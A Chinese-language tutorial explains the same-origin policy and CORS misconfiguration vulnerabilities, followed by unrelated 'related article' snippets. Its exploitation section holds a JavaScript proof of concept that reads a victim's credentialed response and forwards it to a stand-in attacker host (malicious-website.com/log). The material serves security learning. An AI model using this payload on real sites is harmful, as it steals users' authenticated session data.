CORS漏洞学习

CORS漏洞属于一个协议漏洞,具体是由于同源策略的设置问题触发的漏洞,漏洞利用条件较为苛刻,但实战中也常见。

首先要了解同源策略

什么是同源策略?

同源策略是一种Web浏览器安全机制,旨在防止网站相互攻击。

同源策略限制一个源上的脚本访问另一源上的数据。源由 URI 方案、域和端口号组成。例如,考虑以下 URL:

http://normal-website.com/example/example.html

这使用了方案http、域normal-website.com和端口号80。下表显示了如果上述 URL 上的内容尝试访问其他源,将如何应用同源策略:

访问的 URL允许访问吗?
http://normal-website.com/example/是:相同的方案、域和端口
http://normal-website.com/example2/是:相同的方案、域和端口
https://normal-website.com/example/否:不同的方案和端口
http://en.normal-website.com/example/否:不同的域
http://www.normal-website.com/example/否:不同的域
http://normal-website.com:8080/example/否:不同端口*

*Internet Explorer 将允许此访问,因为 IE 在应用同源策略时不考虑端口号。

为什么需要同源策略?

当浏览器从一个源向另一个源发送 HTTP 请求时,与另一域相关的任何 cookie(包括身份验证会话 cookie)也会作为请求的一部分发送。这意味着响应将在用户会话内生成,并包含特定于用户的任何相关数据。如果没有同源策略,如果您访问了恶意网站,它就能够读取您来自 GMail 的电子邮件、来自 Facebook 的私人消息等。

可以参考burp靶场What is CORS (cross-origin resource sharing)? Tutorial & Examples | Web Security Academy

CORS漏洞发现

添加origin字段,发现返回包出现Access-Contorl-Allow-Origin字段

漏洞利用,

1.上述触发条件

2.需要一个服务器放置钓鱼页面

3.引诱用户进行点击界面

复现

登录页面

在服务器上放置脚本界面

将上面的vulunerable-website.com换成下面的域名

var req = new XMLHttpRequest();#创建请求对象req.onload = reqListener;req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
#向https://vulnerable-website.com/sensitive-victim-data发送请求req.withCredentials = true;
req.send();function reqListener() {location='//malicious-website.com/log?key='+this.responseText;
#将返回包信息放到//malicious-website.com/log文件中
};

用户访问上面页面之后

返回的敏感信息

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/627391.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

LeetCode刷题——394. 字符串解码(HOT100)

✊✊✊🌈大家好!本篇文章将较详细介绍栈的题目394. 字符串解码,提供栈和递归两种解法。代码语言为:C代码😇。 🎡导航小助手🎡 394. 字符串解码🔒1、题目:☀️2、思路&…

数学建模-Matlab R2022a安装步骤

软件介绍 MATLAB是一款商业数学软件,用于算法开发、数据可视化、数据分析以及数值计算的高级技术计算语言和交互式环境,主要包括MATLAB和Simulink两大部分,可以进行矩阵运算、绘制函数和数据、实现算法、创建用户界面、连接其他编程语言的程…

2024年【危险化学品经营单位主要负责人】考试报名及危险化学品经营单位主要负责人考试资料

题库来源:安全生产模拟考试一点通公众号小程序 危险化学品经营单位主要负责人考试报名考前必练!安全生产模拟考试一点通每个月更新危险化学品经营单位主要负责人考试资料题目及答案!多做几遍,其实通过危险化学品经营单位主要负责…

NeRF 其三:Instant-NGP

NeRF 其三:Instant-NGP 1. 球谐函数1.1 NeRF 中球谐函数的作用1.2 球谐函数1.2.1 当阶数 j 0 j0 j0 时, m 0 m0 m0:1.2.2 当阶数 j 1 j1 j1 时, m 0 m0 m0:1.2.3 当阶数 j 1 j1 j1 时, m 1 m1 m1&…

SSL弱加密算法的漏洞研究

文章目录 一、什么是 SSL二、SSL/TLS 协议作用三、SSL/TLS 协议的基本思路四、如何保证公钥不被篡改?五、SSLSCAN工具1、下载和安装2、使用六、免责声明一、什么是 SSL SSL 代表安全套接字层。它是一种用于加密和验证应用程序(如浏览器)和 Web 服务器之间发送的数据的协议。…

vue中设置注释模板

参考地址 ctrlshiftp 打开编辑器配置输入configure user snippets - 选择 new global snipp files - 命名为 vueComment,弹出注释模板,即可自定义注释 如下/// 回车 即可在代码块中使用注释 { "Print to console": {"prefix": &q…

什么是游戏盾,游戏盾是如何做到免疫攻击的

什么是游戏盾:游戏盾是针对游戏行业面对的DDoS、CC攻击推出的针对性的网络安全解决方案,相比高防IP,除了能针对大型DDoS攻击(T级别)进行有效防御外,还具备彻底解决游戏行业特有的TCP协议的CC攻击问题能力&a…

拖拽不够自由?Vue3 DnD它来了!

前言 众所周知,在React中有一款非常强大的拖拽库,叫React DnD,而Vue中,大部分都是类似于vue.draggable等拖拽排序的库,然而它并不能满足我们所有的需求,特别是应对一些自由拖拽或混合拖拽的场景(例如&…

OpenHarmony之HDF驱动开发流程指导

开发指导 场景介绍 关于驱动的开发我们主要目的是实现驱动代码的编写,但是驱动开发过程中需要服务管理、消息机制管理,才能使驱动在代码编译过程中进行加载。以下开发步骤中介绍了驱动开发、驱动消息机制管理开发、驱动服务管理开发的步骤。 驱动开发…

henauOJ 1104: 单词数

题目描述 lily的好朋友xiaoou333最近很空,他想了一件没有什么意义的事情,就是统计一篇文章的单词总数。下面你的任务是帮助xiaoou333解决这个问题。 输入 有多组数据,每组一行,每组就是一篇小文章。每篇小文章都是由小写字母和…

spring boot mybatis-plus dynamic-datasource 配置文件 相关依赖环境配置

spring boot mybatis-plus dynamic-datasource 配置文件 相关依赖环境配置 ##yaml配置 server:port: 8866servlet:context-path: /yymtomcat:max-threads: 300connection-timeout: 57000max-connections: 500connection-timeout: 57000 spring:datasource:dynamic:primary: m…

二叉树遍历C++

假设二叉树上各结点的权值互不相同且都为正整数。 给定二叉树的后序遍历和中序遍历,请你输出二叉树的前序遍历的最后一个数字。 输入格式 第一行包含整数 N,表示二叉树结点总数。 第二行给出二叉树的后序遍历序列。 第三行给出二叉树的中序遍历序列。 …

【IPC通信--共享内存mmap】

共享内存是一种高效的进程间通信方式,可以在多个进程之间共享数据,提高程序的效率。mmap是一种常用的实现共享内存的机制,它可以将一个文件或者设备映射到内存中,使得多个进程可以通过访问这块内存来实现数据共享。 一、共享内存…

SpringBoot 源码解析4:refresh 方法解析

SpringBoot 源码解析4:refresh 方法解析 1. refresh 方法解析2. 准备刷新 AbstractApplicationContext#prepareRefresh3. 获取bean工厂 AbstractApplicationContext#obtainFreshBeanFactory4. 准备bean工厂 AbstractApplicationContext#prepareBeanFactory5. Servle…

Java学习,一文掌握Java之SpringBoot框架学习文集(6)

🏆作者简介,普修罗双战士,一直追求不断学习和成长,在技术的道路上持续探索和实践。 🏆多年互联网行业从业经验,历任核心研发工程师,项目技术负责人。 🎉欢迎 👍点赞✍评论…

1、docker常用操作

docker常用操作 1、启动docker2.容器2.1创建容器2.2查看容器2.3启动容器 3、镜像3.1查看镜像3.2创建镜像 4、在宿主机和容器之间交换⽂件5、docker 容器之间通信5.1查看网络5.2创建网络5.3容器连接到网络5.4网络端口映射5.5Docker的跨主机网络访问 1、启动docker 参考&#xf…

Linux 修改文件名称的三种方法

修改文件名称是 Linux 系统中常见的操作之一。有三种方法可以修改文件名称: 1. 使用 mv 命令 mv 命令是用于移动或重命名文件的命令。要使用 mv 命令重命名文件,请使用以下语法: mv old_file_name new_file_name 例如,要将文件…

阿里国际站运营每天具体做什么工作?附运营方法!

相信很多刚接触阿里国际站的运营人员都会迷茫,没有思路还容易产生焦虑,主要就是担心运营没效果!今天大白就带着大家一起揭秘阿里国际站运营每天必做的事情都有哪些,带你更好地了解阿里国际站应该如何运营! 阿里国际站运…

5.【CPP】内存管理(text段data段bss段||nwedelete底层实现||源码)

一.内存管理 1.如图 2.heap下面的空间 应用程序加载到内存中由操作系统完成对bss,data,text,stack加载,并在内存分配空间。在编译阶段已经确定分配了多少空间,属于静态分配。 而malloc等在程序运行时在堆上开辟空间则属于动态分配,需要手动f…

k8s---配置资源管理

内容预知 目录 内容预知 secret资源配置 secert的几种模式 pod如何来引用secret 陈述式创建secret 声明式base64编码配置secret 将secret用vlumes的方式挂载到pod中 传参的方式将环境变量导入pod 如何通过secret加密方式获取仓库密码 configmap的资源配置 陈述式创建…